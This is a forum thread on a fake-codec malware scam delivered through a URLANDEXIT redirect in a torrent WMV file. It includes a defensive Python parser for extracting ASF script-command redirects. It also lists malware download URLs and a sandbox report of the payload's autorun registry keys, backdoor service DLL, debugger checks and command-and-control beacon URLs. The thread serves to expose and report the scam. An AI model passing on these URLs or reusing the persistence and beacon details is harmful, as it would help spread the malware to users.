URLANDEXIT tag in WMV


evaluator
November 4th, 2009, 10:03
Fake torrent: the URLANDEXIT tag inside the WMV file contains
http//tpbtrack.com/
which redirects to http//microsoftmedicenter.com/ for download of
codec_update2.7.exe

Kill this web page soon, Don W!
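The post above describes the mechanism but not how to see it: a WMV is an ASF container, and the redirect lives in a Script Command Object inside the file's Header Object, where a command of type URLANDEXIT tells Windows Media Player to open a URL. The following Python is an added example (my code, not the thread's or any poster's) that parses the Header Object, walks its sub-objects and extracts every script command, so a suspicious WMV can be triaged offline without ever playing it. The two GUIDs are the ones given in the ASF specification for the Header Object and the Script Command Object; the sample header it builds in memory is constructed test input carrying the tpbtrack.com URL from the post, not bytes from the real file.

```python
import struct
import uuid

# ASF object GUIDs from the ASF specification, in their on-disk little-endian layout.
ASF_HEADER_OBJECT = uuid.UUID("75B22630-668E-11CF-A6D9-00AA0062CE6C").bytes_le
ASF_SCRIPT_COMMAND_OBJECT = uuid.UUID("1EFB1A30-0B62-11D0-A39B-00A0C90348F6").bytes_le

# Script command types that make Windows Media Player open a URL in the browser.
REDIRECT_TYPES = {"URL", "URLANDEXIT"}


def parse_script_commands(data):
    """Return [(presentation_time_ms, type_name, command_text)] for every
    Script Command Object found in the ASF Header Object at the start of data."""
    if len(data) < 30 or data[:16] != ASF_HEADER_OBJECT:
        raise ValueError("not an ASF file (Header Object GUID missing)")
    header_size, sub_count = struct.unpack_from("<QI", data, 16)
    end = min(header_size, len(data))   # never trust the declared size blindly
    pos = 30                            # GUID(16) + size(8) + count(4) + reserved(2)
    found = []
    for _ in range(sub_count):
        if pos + 24 > end:
            break                       # truncated header
        guid = data[pos:pos + 16]
        (size,) = struct.unpack_from("<Q", data, pos + 16)
        if size < 24 or pos + size > end:
            break                       # malformed size: stop instead of looping or overreading
        if guid == ASF_SCRIPT_COMMAND_OBJECT:
            found.extend(_parse_script_object(data[pos + 24:pos + size]))
        pos += size
    return found


def _parse_script_object(body):
    """body = Script Command Object minus its 24-byte object header."""
    out = []
    try:
        n_commands, n_types = struct.unpack_from("<HH", body, 16)  # after 16-byte reserved GUID
        pos = 20
        types = []
        for _ in range(n_types):
            (nchars,) = struct.unpack_from("<H", body, pos)        # length in UTF-16 code units
            pos += 2
            types.append(body[pos:pos + 2 * nchars].decode("utf-16-le", "replace"))
            pos += 2 * nchars
        for _ in range(n_commands):
            t_ms, type_idx, nchars = struct.unpack_from("<IHH", body, pos)
            pos += 8
            text = body[pos:pos + 2 * nchars].decode("utf-16-le", "replace")
            pos += 2 * nchars
            type_name = types[type_idx] if type_idx < len(types) else "?%d" % type_idx
            out.append((t_ms, type_name, text))
    except struct.error:
        pass                            # object ends early: keep what was parsed so far
    return out


def find_redirects(data):
    """Only the commands that would make WMP navigate somewhere."""
    return [c for c in parse_script_commands(data) if c[1].upper() in REDIRECT_TYPES]


def build_sample(types, commands):
    """Constructed test input: a minimal ASF header holding one Script Command Object.
    commands = [(presentation_time_ms, type_index, text)]."""
    body = bytes(16) + struct.pack("<HH", len(commands), len(types))
    for t in types:
        body += struct.pack("<H", len(t)) + t.encode("utf-16-le")
    for t_ms, idx, text in commands:
        body += struct.pack("<IHH", t_ms, idx, len(text)) + text.encode("utf-16-le")
    obj = ASF_SCRIPT_COMMAND_OBJECT + struct.pack("<Q", 24 + len(body)) + body
    return ASF_HEADER_OBJECT + struct.pack("<QI", 30 + len(obj), 1) + b"\x01\x02" + obj


# Sample modelled on the post: one URLANDEXIT command at t=0 pointing at tpbtrack.com.
SAMPLE = build_sample(["URLANDEXIT"], [(0, 0, "http://www.tpbtrack.com/")])


def scan_file(path):
    with open(path, "rb") as f:
        return find_redirects(f.read())


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for t_ms, kind, text in find_redirects(data):
        print("%8d ms  %-12s %s" % (t_ms, kind, text))
```

Run it with a path to a downloaded .wmv to list its redirect commands; with no argument it parses the built-in sample. The size checks matter because a hostile file can declare object sizes that overrun the buffer or never advance the cursor.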

Woodmann
November 4th, 2009, 17:38
Howdy,

I can't kill it eval, Comodo won't let me.

Don W

evaluator
January 27th, 2010, 09:13
Happy New Year, Don Wooma!

You are a true fighter against malware!
Today I checked, and microsoftmedicenter doesn't exist... nor does tpbtrack.com..

But wait! What if we type:
http://www.tpbtrack.com/
!>!>!>

It works! And redirects to:

http://microsoftmediaplayer.net/pluginerror/

Bonus site for malware DL:
http://ppirush.com/list.txt

Woodmann
January 27th, 2010, 18:53
Howdy,

The redirect doesn't work.
Firefox can't find the server at microsoftmediaplayer.net.

Micro probably had that site killed.

Woodmann

evaluator
January 28th, 2010, 07:45
Not killed at all..
Maybe for you that address is just blocked as malicious?
Here is a TCP dump of the session with the malware..

DNS-query:
91.121.97.116 > ks28732.kimsufi.com

Th3_uN1Qu3
February 11th, 2010, 15:37
Quote:
Originally Posted by evaluator
Not killed at all..
Maybe for you that address is just blocked as malicious?


I can confirm that, site is still online. Hmm, it's the good old codec scam. Wonder how many will fall for it again.

Silkut
February 14th, 2010, 10:30
http://www.virustotal.com/analisis/3a4b84557ffbbd32cdaf43efbc0ba5d11a5b22d690580da5930a79da0027b662-1266157076 (8/41 detections)
Also submitted on TE/Jotti/CWSandbox/Norman/Sunbelt

Registry changes and network activity are interesting...

Ensures it runs at every start
Code:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "TOY5KNQ8OC" = C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\Hm1.exe


Drops shit (bet it's a backdoor)
Code:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SSHNAS\Parameters "ServiceDll" = [REG_EXPAND_SZ, value: C:\WINDOWS\system32\sshnas21.dll]


Changes filetype association:
Code:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ScriptOk"


Encrypted config to avoid easy detection
Code:
HKEY_CURRENT_USER\Software\TOY5KNQ8OC "Hr0" = tSLPLpWL7R22spR48AI743bz2Kge8sERw0qmuz25hgohx8cxtNMwr8rBWqitGUb/zraVBDDj5hLpEwYXNxEcPXZ9sJFaDKKtXmxIvCsKfL3BUK2YmKdwy0wP+mREmBu3qeV4TyHp6lc/8xIj6ehCR1T2ygeXbopFSi+wcuZzVX7WEc60vs/gvM40+JErmIzaB2QhZba725R1sr2kOfmVOMnMlPUv0JruzRQ9mA==


Abuses your TCP/IP network
Code:
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\Tcp6
\Device\RasAcd


Adds tasks (and hides them)
Code:
C:\WINDOWS\Tasks\{35DC3473-A719-4d14-B7C1-FD326CA84A0C}.job


Checks for nifty tools
Code:
Open File: \\.\SICE (OPEN_EXISTING)
Open File: \\.\NTICE (OPEN_EXISTING)
Open File: \\.\SIWVIDSTART (OPEN_EXISTING)
Open File: \\.\VMDRV (OPEN_EXISTING)
Open File: \\.\PIPE\ROUTER (OPEN_EXISTING)


Posts shit to infected sites
Code:
http://66.199.229.230/bbgfvdfv.php?data=v26MmjSySdemXz907AUYROBra+ftI9M9b4xfTXYnLRkHCVTSihWLzGqhA0jEdVaN1M6V6shGcAiBMF4QEHbzbYSRtufQpaX/NPttvu7rkw== (workartsstudio.com)
http://64.20.38.251/logos/2aac1e812a13a04cf10ec85187f31ca7b22154fc7b77b63fec5e37e6648b5f8a317d04508db39388c/64d84457f3e/logo.gif (homeartscenter.com)
http://94.75.228.24/werber/34f8b457d37/217.gif (multiartshouse.com)
http://69.10.35.253/perce/9acc6e112a53a02cf1fef83147c3fc073291b47c8b77c66ffccea7e6e42baf7ae11d94007d4333783/24a874f7a37/qwerce.gif (tangoartsshow.com)
http://208.43.125.180/oms.php (yourgot.com)
http://66.197.161.246/resolution.php (motorolam.com)
http://66.197.161.247/borders.php (easyaw.com)

etc etc...

MMPC report status (so they can shut this prick down): https://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?SubmissionId=e3d2c8a8-480b-4228-bdf3-5b7f2f302ba2&n=1

evaluator
September 6th, 2010, 14:13
Today I checked, and
http://www.tpbtrack.com/
is for sale..

DonWooma, you are amazing!!

But still alive is:
http://microsoftmediaplayer.net/pluginerror/

Woodmann
September 6th, 2010, 17:41
Why must you do this to me.

DW